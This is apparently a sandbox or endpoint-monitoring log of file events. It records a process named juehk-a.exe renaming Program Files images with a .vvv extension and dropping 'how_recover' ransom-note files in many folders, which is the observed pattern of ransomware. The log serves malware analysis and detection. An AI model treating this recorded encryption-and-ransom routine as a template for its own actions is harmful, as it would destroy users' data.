- sequenceNumber: 1674
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\THMBNAIL.PNG
- filesize: 18380
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499649
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 87988
- mode: rename
- sequenceNumber: 1675
- filesize: 18798
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499649
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88014
- mode: created
- sequenceNumber: 1676
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521351
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88020
- mode: created
- sequenceNumber: 1677
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\STUDIO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521352
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88027
- mode: open
- sequenceNumber: 1678
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\THMBNAIL.PNG
- filesize: 44302
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499650
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88037
- mode: rename
- sequenceNumber: 1679
- filesize: 44718
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499650
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88057
- mode: created
- sequenceNumber: 1680
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521353
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88063
- mode: created
- sequenceNumber: 1681
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\SUMIPNTG\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521354
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88068
- mode: open
- sequenceNumber: 1682
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\THMBNAIL.PNG
- filesize: 42453
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499651
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88077
- mode: rename
- sequenceNumber: 1683
- filesize: 42878
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499651
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88127
- mode: created
- sequenceNumber: 1684
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521355
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88133
- mode: created
- sequenceNumber: 1685
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATER\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521356
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88139
- mode: open
- sequenceNumber: 1686
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\THMBNAIL.PNG
- filesize: 30170
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953499652
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88149
- mode: rename
- sequenceNumber: 1687
- filesize: 30590
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- old_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\THMBNAIL.PNG
- new_name: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\THMBNAIL.PNG.vvv
- ads:
- fid (ads:): 562949953499652
- ntstatus: 0x0
- CreateOptions: 0x0
- file:
- timestamp: 88176
- mode: created
- sequenceNumber: 1688
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521357
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88183
- mode: created
- sequenceNumber: 1689
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\WATERMAR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521358
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88189
- mode: created
- sequenceNumber: 1690
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521359
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88195
- mode: created
- sequenceNumber: 1691
- value: C:\Program Files\Common Files\Microsoft Shared\THEMES15\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521360
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88243
- mode: created
- sequenceNumber: 1692
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521361
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88251
- mode: created
- sequenceNumber: 1693
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENES\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521362
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88259
- mode: created
- sequenceNumber: 1694
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521363
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88273
- mode: created
- sequenceNumber: 1695
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ENFR\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521364
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88284
- mode: created
- sequenceNumber: 1696
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521365
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88291
- mode: created
- sequenceNumber: 1697
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\ESEN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521366
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88324
- mode: created
- sequenceNumber: 1698
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521367
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88346
- mode: created
- sequenceNumber: 1699
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\FREN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521368
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88352
- mode: created
- sequenceNumber: 1700
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521369
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88358
- mode: created
- sequenceNumber: 1701
- value: C:\Program Files\Common Files\Microsoft Shared\TRANSLAT\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521370
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88365
- mode: created
- sequenceNumber: 1702
- value: C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521371
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88379
- mode: created
- sequenceNumber: 1703
- value: C:\Program Files\Common Files\Microsoft Shared\Triedit\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521372
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88386
- mode: created
- sequenceNumber: 1704
- value: C:\Program Files\Common Files\Microsoft Shared\Triedit\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521373
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88392
- mode: created
- sequenceNumber: 1705
- value: C:\Program Files\Common Files\Microsoft Shared\Triedit\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521374
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88399
- mode: created
- sequenceNumber: 1706
- value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521375
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88406
- mode: created
- sequenceNumber: 1707
- value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521376
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88412
- mode: created
- sequenceNumber: 1708
- value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521377
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88419
- mode: created
- sequenceNumber: 1709
- value: C:\Program Files\Common Files\Microsoft Shared\VBA\VBA7.1\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521378
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88425
- mode: created
- sequenceNumber: 1710
- value: C:\Program Files\Common Files\Microsoft Shared\VBA\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521379
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88432
- mode: created
- sequenceNumber: 1711
- value: C:\Program Files\Common Files\Microsoft Shared\VBA\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521380
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88439
- mode: created
- sequenceNumber: 1712
- value: C:\Program Files\Common Files\Microsoft Shared\VC\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521381
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88445
- mode: created
- sequenceNumber: 1713
- value: C:\Program Files\Common Files\Microsoft Shared\VC\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521382
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88452
- mode: created
- sequenceNumber: 1714
- value: C:\Program Files\Common Files\Microsoft Shared\VGX\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521383
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88458
- mode: created
- sequenceNumber: 1715
- value: C:\Program Files\Common Files\Microsoft Shared\VGX\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521384
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88503
- mode: created
- sequenceNumber: 1716
- value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521385
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88509
- mode: created
- sequenceNumber: 1717
- value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521386
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88516
- mode: created
- sequenceNumber: 1718
- value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521387
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88522
- mode: created
- sequenceNumber: 1719
- value: C:\Program Files\Common Files\Microsoft Shared\VSTO\10.0\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521388
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88536
- mode: created
- sequenceNumber: 1720
- value: C:\Program Files\Common Files\Microsoft Shared\VSTO\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521389
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88541
- mode: created
- sequenceNumber: 1721
- value: C:\Program Files\Common Files\Microsoft Shared\VSTO\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521390
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88547
- mode: created
- sequenceNumber: 1722
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\1033\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521391
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88554
- mode: created
- sequenceNumber: 1723
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\1033\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521392
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88558
- mode: created
- sequenceNumber: 1724
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521393
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88566
- mode: created
- sequenceNumber: 1725
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\BIN\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521394
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88572
- mode: created
- sequenceNumber: 1726
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521395
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88580
- mode: created
- sequenceNumber: 1727
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\15\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521396
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88586
- mode: created
- sequenceNumber: 1728
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521397
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88594
- mode: created
- sequenceNumber: 1729
- value: C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521398
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88601
- mode: created
- sequenceNumber: 1730
- value: C:\Program Files\Common Files\Microsoft Shared\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521399
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88607
- mode: created
- sequenceNumber: 1731
- value: C:\Program Files\Common Files\Microsoft Shared\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521400
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88614
- mode: created
- sequenceNumber: 1732
- value: C:\Program Files\Common Files\Services\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521401
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88620
- mode: created
- sequenceNumber: 1733
- value: C:\Program Files\Common Files\Services\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521402
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88628
- mode: failed
- sequenceNumber: 1734
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 88634
- mode: failed
- sequenceNumber: 1735
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 88640
- mode: failed
- sequenceNumber: 1736
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 88647
- mode: failed
- sequenceNumber: 1737
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 88653
- mode: failed
- sequenceNumber: 1738
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 88659
- mode: failed
- sequenceNumber: 1739
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\TTS20\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 0
- failure: open
- ntstatus: 0xc0000022
- CreateOptions: 0x60
- file:
- timestamp: 88665
- mode: created
- sequenceNumber: 1740
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521403
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88678
- mode: created
- sequenceNumber: 1741
- value: C:\Program Files\Common Files\SpeechEngines\Microsoft\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521404
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88685
- mode: created
- sequenceNumber: 1742
- value: C:\Program Files\Common Files\SpeechEngines\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521405
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88691
- mode: created
- sequenceNumber: 1743
- value: C:\Program Files\Common Files\SpeechEngines\how_recover+deg.html
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521406
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88698
- mode: created
- sequenceNumber: 1744
- value: C:\Program Files\Common Files\System\ado\en-US\how_recover+deg.txt
- processinfo:
- pid: 1648
- imagepath: C:\Users\Administrator\AppData\Roaming\juehk-a.exe
- md5sum: 89e9a40d5ea6a735e0f4aa0a619459bc
- ads:
- fid (ads:): 562949953521407
- ntstatus: 0x0
- CreateOptions: 0x60
- file:
- timestamp: 88704
- mode: created
- sequenceNumber: 1745
- value: C:\Program Files\Common Files\System\ado\en-US\how_recover+deg.html
- processinfo:
- pid: 1648
